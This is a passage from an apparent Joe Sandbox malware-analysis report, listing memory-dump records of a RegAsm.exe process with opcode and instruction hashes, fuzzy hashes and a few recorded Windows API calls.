                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: d
                                                                            • API String ID: 0-2564639436
                                                                            • Opcode ID: 1b876ba48630ea2f734a1bf3efc98cb299da953287c04b46c1000c9f1effbec7
                                                                            • Instruction ID: ab3cff17dec7d7118b1a13284167669c9c18d3650c37ccf06c3bd35772080c13
                                                                            • Opcode Fuzzy Hash: 1b876ba48630ea2f734a1bf3efc98cb299da953287c04b46c1000c9f1effbec7
                                                                            • Instruction Fuzzy Hash: 7ED15A75600602CFC7A4DF19C5809AABBF2FF89310729CA99D45A9B666D730FC46CF90
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,015AD2C6,?,?,?,?,?), ref: 015AD387
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2860265659.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_15a0000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 4ef6f021cab1f017f5032a380d1a137fbbb647e602912aa803dfbb20acf7bebc
                                                                            • Instruction ID: 0ef0b95d37ae1e092b38b975e861485916941a8affa7898058fdcd35724a7c3a
                                                                            • Opcode Fuzzy Hash: 4ef6f021cab1f017f5032a380d1a137fbbb647e602912aa803dfbb20acf7bebc
                                                                            • Instruction Fuzzy Hash: 8621E2B5D00248DFDB10CFA9D985AEEBFF4FB48314F14841AE918A7250C378A944CFA5
                                                                            APIs
                                                                            • OleInitialize.OLE32(00000000), ref: 06E43F8D
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Initialize
                                                                            • String ID:
                                                                            • API String ID: 2538663250-0
                                                                            • Opcode ID: b708caf4bfa041c9962541b2d77204875978fd40c399251eef56fec656448e66
                                                                            • Instruction ID: b5f3e463ec48cc00258206ed15f3cc07d1950d9836039b84651efb0ff39d8b90
                                                                            • Opcode Fuzzy Hash: b708caf4bfa041c9962541b2d77204875978fd40c399251eef56fec656448e66
                                                                            • Instruction Fuzzy Hash: 551103B1900748CFCB20DFAAE545BDEBBF4EB49324F24845AE518A7210C378A544CFA5
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 015AB086
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2860265659.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_15a0000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 782f5470fc16a888efaef8df68b45891d62cfa59864520e8da8f6312479cba8d
                                                                            • Instruction ID: 5f2f6ecf811d738cd3dac9bed8a4d93a8d217eae91f1df50b194835c57c6fe29
                                                                            • Opcode Fuzzy Hash: 782f5470fc16a888efaef8df68b45891d62cfa59864520e8da8f6312479cba8d
                                                                            • Instruction Fuzzy Hash: 0211DFB6C007498FDB20DF9AC444A9EFFF4FB89624F14841AD529B7210C379A549CFA1
                                                                            APIs
                                                                            • OleInitialize.OLE32(00000000), ref: 06E43F8D
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2963842199.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6e40000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Initialize
                                                                            • String ID:
                                                                            • API String ID: 2538663250-0
                                                                            • Opcode ID: 4ac6c5255c3e7999268c992ed1c7528f1e4c83cade0dd69cbc3f7481abe43704
                                                                            • Instruction ID: 89c7bc282f54c909326aac73d574d813f71f8244c117105eadadbd82b46a14cf
                                                                            • Opcode Fuzzy Hash: 4ac6c5255c3e7999268c992ed1c7528f1e4c83cade0dd69cbc3f7481abe43704
                                                                            • Instruction Fuzzy Hash: 061145B18043488FCB20EFAAD448BDEFBF4EB48320F208419D518A3200C378A944CFA1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q
                                                                            • API String ID: 0-1259897404
                                                                            • Opcode ID: 69e9c752e0048bab911a3071088f22361d99598b5323778ff0ce0d46d8cd8341
                                                                            • Instruction ID: df92b2782774232f35f6419b5c5f92d2861f3e3cf3754ee3f8a0e4e0cfca44e7
                                                                            • Opcode Fuzzy Hash: 69e9c752e0048bab911a3071088f22361d99598b5323778ff0ce0d46d8cd8341
                                                                            • Instruction Fuzzy Hash: 193147317053508FC75ABB38A8504AE7BEAEFCA61130544AAD44ACF356CE34DC0BC7A1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q
                                                                            • API String ID: 0-1259897404
                                                                            • Opcode ID: c0511fa2887d1ff5c91f8710c75759c9889a74631891694bce3aafbccbbe535e
                                                                            • Instruction ID: 793990f4b4eb179a2cc6c5b2d26453590d33be7ac7c39bbfac93385be3b97ce6
                                                                            • Opcode Fuzzy Hash: c0511fa2887d1ff5c91f8710c75759c9889a74631891694bce3aafbccbbe535e
                                                                            • Instruction Fuzzy Hash: C231AB707012058FDB09BB79A8A45AE76E7EFC9210B10483DD51BCB394EE349E0687A2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q
                                                                            • API String ID: 0-1259897404
                                                                            • Opcode ID: f31b6ee1c36c12666c32de32aaead36bede1fc4a3b87f0dd0f7a2c04d0206c77
                                                                            • Instruction ID: 71491f17937601098606df89a5f13d8700266c9c63a20f84593ac70ec866bf4b
                                                                            • Opcode Fuzzy Hash: f31b6ee1c36c12666c32de32aaead36bede1fc4a3b87f0dd0f7a2c04d0206c77
                                                                            • Instruction Fuzzy Hash: A4012474A06289BFCB06EF78E59559CBFB0FF45204B1400EDC88997291EB385E88CB12
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q
                                                                            • API String ID: 0-1259897404
                                                                            • Opcode ID: 474885695805f0783da54e128b7e02ceaa9f7c5f615c2cf269cb315d89f9c7e4
                                                                            • Instruction ID: 320eea9f1e338ec792f003bb4170538e88b0c32690a2a465db6a0ec4c056207c
                                                                            • Opcode Fuzzy Hash: 474885695805f0783da54e128b7e02ceaa9f7c5f615c2cf269cb315d89f9c7e4
                                                                            • Instruction Fuzzy Hash: 8DF090313402018FC659FB2DE85096E77DFEFC9650710492DD04A8B328EF74EC0A83A1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q
                                                                            • API String ID: 0-1259897404
                                                                            • Opcode ID: b9f734fd1a5af07b8a8efe1506316c71087207e24dfbc96c59136fde6ae3ff81
                                                                            • Instruction ID: edd789c1006297f3b2c9fc108041ca6f568fb9c1661f2fd5291a33133caa6c5e
                                                                            • Opcode Fuzzy Hash: b9f734fd1a5af07b8a8efe1506316c71087207e24dfbc96c59136fde6ae3ff81
                                                                            • Instruction Fuzzy Hash: 63F08C74A02209FFCB05EFB8E54999CBBB5FF84205B5041ADC80A972A4DB385E88DB45
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 27b2887232eb9f4eee84e18ae5d0641aaeee5868c0646be76d5ca9a9df667690
                                                                            • Instruction ID: 45342fb4c1d8e0822de052d5bde336cc1a7acab79bd81c38c093d23a644b893a
                                                                            • Opcode Fuzzy Hash: 27b2887232eb9f4eee84e18ae5d0641aaeee5868c0646be76d5ca9a9df667690
                                                                            • Instruction Fuzzy Hash: F1928170B502189FDB54CB68CD50AEDBBB6EF88700F1080D9EA06AB3A1DB759E40DF51
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3948f1903ff775dbc4f57e5378443d3529afadbb78969ac13d1c07c09c47a5b5
                                                                            • Instruction ID: f17ae049a9283696c16fa4d2b8ca75210a3ccc1f0f03e73f19d54501f321b80d
                                                                            • Opcode Fuzzy Hash: 3948f1903ff775dbc4f57e5378443d3529afadbb78969ac13d1c07c09c47a5b5
                                                                            • Instruction Fuzzy Hash: C6924A74B402149FCB44CF69C995E6ABBF6EF89704F118099E916EB3A1CB75EC40CB60
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 11e3aef7d38bf775a2cbe51ba7a23166d6ea1e1c420f14ae0dd11efaea7a9cca
                                                                            • Instruction ID: b490b3fe8690a5d14822ba9a05ee0ab667a2edda1d32484a3574f650aa63ff22
                                                                            • Opcode Fuzzy Hash: 11e3aef7d38bf775a2cbe51ba7a23166d6ea1e1c420f14ae0dd11efaea7a9cca
                                                                            • Instruction Fuzzy Hash: 0352A174B502148FDB54DB28C991EAE77B6EF88700F109099FE069B3A1CB76ED41CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5a866e5d994a0ce66730a39583b48bdb4f90f961b632e387887087fc3b2018f9
                                                                            • Instruction ID: 337ee5afcc33e32f4aa9948de1e06b1c86075395d258e2fff25f52e0e268b4d9
                                                                            • Opcode Fuzzy Hash: 5a866e5d994a0ce66730a39583b48bdb4f90f961b632e387887087fc3b2018f9
                                                                            • Instruction Fuzzy Hash: 4242BB707406168FCB69EF79E540A2E7AB6FF85704B00199CD9039B394CF79EC098B96
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 46d1de9e650c93c42d599919c290021a5832a573684121b225767edeeed25b30
                                                                            • Instruction ID: a2d0b074c2cc8cfcb1a1783b8692dbfeea78c30adcb25dc95676b061b110a8e2
                                                                            • Opcode Fuzzy Hash: 46d1de9e650c93c42d599919c290021a5832a573684121b225767edeeed25b30
                                                                            • Instruction Fuzzy Hash: 9602AD707403158FCB599F6AD954A2E7BB6FF89704F005598EA028B3A1CF79EC05CB92
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1bcb7432c2030378a5abfb546d518bbd0f2cd8536a9b1338eb2b72d0188108d1
                                                                            • Instruction ID: 2809846c47c87bfd727721986bf2e6f0e6846115b2f0336406a6035190e8fb6d
                                                                            • Opcode Fuzzy Hash: 1bcb7432c2030378a5abfb546d518bbd0f2cd8536a9b1338eb2b72d0188108d1
                                                                            • Instruction Fuzzy Hash: B802A1707403158FCB98DF6AD954A2A7BB6FF89704F005499EA029B3A1CF79EC05CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: faebaf63ddbaf235d7ccfccd0fb22f98f52c5ca7d7f64b702ab749be460176ff
                                                                            • Instruction ID: 19b60350991a0a27c690cd0e82a13986f47363c8456c1c8cf85bab406f96e5e7
                                                                            • Opcode Fuzzy Hash: faebaf63ddbaf235d7ccfccd0fb22f98f52c5ca7d7f64b702ab749be460176ff
                                                                            • Instruction Fuzzy Hash: 2CE1C470B003158FDB98DB66D954A397BB6FF89704F105499EA028B3A1CFB9EC05CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6704ba5a3691aef800d7bd139cdd55a0d051db3efcebfa00a67d9fb3b6d0b7fc
                                                                            • Instruction ID: 97e81c292a381893f5a34a22a4e4470d5c7ec5a397c5c7fd3fccbba65bcd878c
                                                                            • Opcode Fuzzy Hash: 6704ba5a3691aef800d7bd139cdd55a0d051db3efcebfa00a67d9fb3b6d0b7fc
                                                                            • Instruction Fuzzy Hash: 8AD19270B103158FDB889B66C955B397BB6FF89704F109499EA028B3A1CFB9DC05CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fbbe49f025a8799888526760bda7db5842a517bd4eb56814c4459257c0dc405a
                                                                            • Instruction ID: 039957fbc73c039305e7239fd86b8bd78d44afd1d2c50e59ac030f0493f7422a
                                                                            • Opcode Fuzzy Hash: fbbe49f025a8799888526760bda7db5842a517bd4eb56814c4459257c0dc405a
                                                                            • Instruction Fuzzy Hash: C5C18070B103059FDB889B66C955A797BB6FF89704F109095EA02CB3A1CBB9DC40CBA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 14302ad2fb67e5bddec33e0a571bd1a8709ae2d02fdd53e467195dc140e729ff
                                                                            • Instruction ID: 132edf5c8f893b41c72fb62d295c85c017211fc2357c72a1f37853bacd4b37a1
                                                                            • Opcode Fuzzy Hash: 14302ad2fb67e5bddec33e0a571bd1a8709ae2d02fdd53e467195dc140e729ff
                                                                            • Instruction Fuzzy Hash: 7E5134B1E10259CFDB54DFA9C880BDEBBB5FF88308F248469D419AB254DB749846CF90
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 066765269c2692387618e80ed46eefaaa3a08418c399174ccd3b9a30b2133232
                                                                            • Instruction ID: 809ed682d2920c72e4f76d3814436444b582a7e4a593c68d999558492c4645f0
                                                                            • Opcode Fuzzy Hash: 066765269c2692387618e80ed46eefaaa3a08418c399174ccd3b9a30b2133232
                                                                            • Instruction Fuzzy Hash: 69514875B10519AFCB44CF69C98499EBBF2EF89310B1580A9FD15AB3A1DB30EC05CB50
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b0de38b5ab414a225ad15a9fb1650060d64f00e616002ec020188d017fbae6ca
                                                                            • Instruction ID: 7e996e5aa03ce25ed6d2c633ea4a525d993c185ff948570dd0087904b25281dc
                                                                            • Opcode Fuzzy Hash: b0de38b5ab414a225ad15a9fb1650060d64f00e616002ec020188d017fbae6ca
                                                                            • Instruction Fuzzy Hash: 295132B0D10249DFDB60DFA9C880BDEBBB9FB48308F248529E419AB240DB749845CF91
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ed1b2f05c7058919e52e47376dee6f5bcde76b6d94ed71151dc5b31c867b07f8
                                                                            • Instruction ID: dec804dbf5e30a640a87f266b03013a079417fc735fd78f747be573d57170186
                                                                            • Opcode Fuzzy Hash: ed1b2f05c7058919e52e47376dee6f5bcde76b6d94ed71151dc5b31c867b07f8
                                                                            • Instruction Fuzzy Hash: 27318F75B012109FCB55EF38D84499EBBB6FF89301B0485A9E905CB366DB34DD06CBA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 21de4f9243404be70a20a6314520d8c49a13dd24f7d60ffb18add06cbb48f5df
                                                                            • Instruction ID: 5133b2ac6726f50302d8b4804c3d296352feface33d2e3e4b4f7ac32c455b3c6
                                                                            • Opcode Fuzzy Hash: 21de4f9243404be70a20a6314520d8c49a13dd24f7d60ffb18add06cbb48f5df
                                                                            • Instruction Fuzzy Hash: 2D316F75B012109FCB55EF38D88495EBBB6FF89300B108469E905CB366DB35DD06CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f6c20dde209588037a4c8e581659e4d249cd5d4b8c69ae0dde6551310facf843
                                                                            • Instruction ID: e35493eb0ef8ec0f2af72a3cf1d92175624bef216e0e8e4d84bd2180e75744f9
                                                                            • Opcode Fuzzy Hash: f6c20dde209588037a4c8e581659e4d249cd5d4b8c69ae0dde6551310facf843
                                                                            • Instruction Fuzzy Hash: 17316E75E146199FCB45CFAAD8808DEFBB6FF89300B1580AAF814EB360D771A905CB51
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 11c845d877e5deb47f91df0eb02c2f99ad023ef169812b13185a382f01eb16bb
                                                                            • Instruction ID: 22ea55a686bee4e2a86be879c6afaf5ee382e0ebcdf02d34b988f4f273e292a0
                                                                            • Opcode Fuzzy Hash: 11c845d877e5deb47f91df0eb02c2f99ad023ef169812b13185a382f01eb16bb
                                                                            • Instruction Fuzzy Hash: 4D41EEB1D01248DFDB54DFAAD940ADEBBB6EF88310F14806AE419B7250DB34A945CF90
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7fdfbd300240e0f7cfe1d0dca157e2531dff543fcc9d5d3ec15d9fa768918fda
                                                                            • Instruction ID: 387980a1abeecedbfa6e101b579fea4239faa762d10d8c0be3adc6bfb928490b
                                                                            • Opcode Fuzzy Hash: 7fdfbd300240e0f7cfe1d0dca157e2531dff543fcc9d5d3ec15d9fa768918fda
                                                                            • Instruction Fuzzy Hash: 1B3102B1D012489FDB14DFAAC940ADEBFB6EF88300F14802AE419AB250DB345945CFA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fece19c9795c93887ebff2956e7f126152810d9ac018e8e4dabee0520cf62972
                                                                            • Instruction ID: 27929a40487218e4d2bcf8be3957e1cb8206832399e62d2137907cab957550c6
                                                                            • Opcode Fuzzy Hash: fece19c9795c93887ebff2956e7f126152810d9ac018e8e4dabee0520cf62972
                                                                            • Instruction Fuzzy Hash: B53124B1D01259DFDB54DFA9D890ADEBBF9FF88310F24846AE409B7240CB75A845CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962814960.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b60000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 946433f5a55e429b896a467727be87c72a99d0e329bc40f9cdae909f7e538d1f
                                                                            • Instruction ID: 5f70b54d88bc618b55ab755e2879f5b899aeee5a00ff3b12d93b025c864851dc
                                                                            • Opcode Fuzzy Hash: 946433f5a55e429b896a467727be87c72a99d0e329bc40f9cdae909f7e538d1f
                                                                            • Instruction Fuzzy Hash: 6921F770B001559FCB55CBAED9408AABBF7EFD9210B1495AAE815DB7A1CB34CC10C7A1
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2859561874.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_146d000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 975813b950e6e205bd86e363f0c898e4db68aa5c44b24d28bf488fc5b4f44199
                                                                            • Instruction ID: 7658b2e2990d5c6115b4da021af73b9d71c69db295c756a41e073d3c886d340c
                                                                            • Opcode Fuzzy Hash: 975813b950e6e205bd86e363f0c898e4db68aa5c44b24d28bf488fc5b4f44199
                                                                            • Instruction Fuzzy Hash: 5821F471A00240DFDB15DF58D9C0F27BF69FB8831CF24C56AD9490A626C336D456C6A2
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2859561874.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_146d000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5a212d777082a13cbf33d4e3d573436fee5477297bb4bc903d9d8cd19004f2bb
                                                                            • Instruction ID: 2f1341180828bd58cb3e75085099a348eeefc85e42e1238c55adecc2d570fe0c
                                                                            • Opcode Fuzzy Hash: 5a212d777082a13cbf33d4e3d573436fee5477297bb4bc903d9d8cd19004f2bb
                                                                            • Instruction Fuzzy Hash: F9212771A00244DFDB05CF54C9C0F56BF69FB98318F24C57AD9490B326C33AE846CAA2
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ff96ceb9e7c4fa33a2642e3c8f1fb5401d9bcfea244e69a2779bce74a9d7d522
                                                                            • Instruction ID: 969a43f6e4f67a7d823f6ad312e86e9ae7f122d397b36135e45cc6fce356b231
                                                                            • Opcode Fuzzy Hash: ff96ceb9e7c4fa33a2642e3c8f1fb5401d9bcfea244e69a2779bce74a9d7d522
                                                                            • Instruction Fuzzy Hash: E121C0F03112464FDB45DB28FC44AAB7BADEB84305B04566AE00487269EB799D08CBA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2962985756.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_6b80000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 83f466c81bb3291ccc114ae1a221596b4b53c352b5464f169778708e39d42b1f
                                                                            • Instruction ID: 4ad109ba118947cfc048dc08f2b14b647f0bbe29458a99570e8b3b8cbf125b0e
                                                                            • Opcode Fuzzy Hash: 83f466c81bb3291ccc114ae1a221596b4b53c352b5464f169778708e39d42b1f
                                                                            • Instruction Fuzzy Hash: BE11E3322092E42FC7535A696C208FB7FEEDE8A165309419BFA85C7153C428CE26D7B1
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2859632563.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_147d000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: aa0214a1fba88d5fbc199eb3a2f9260c780fa4050291d17cd4595e68093ce219
                                                                            • Instruction ID: f30bd467b0f5bb7d0cdb6b55c0221a1fa9409c2629c8af27d59db5db715e8866
                                                                            • Opcode Fuzzy Hash: aa0214a1fba88d5fbc199eb3a2f9260c780fa4050291d17cd4595e68093ce219
                                                                            • Instruction Fuzzy Hash: 832125B1914280DFCB16DF68D980B56BF65EF84318F24C56ED9094B366C33AD407CA61
                                                                            Memory Dump Source
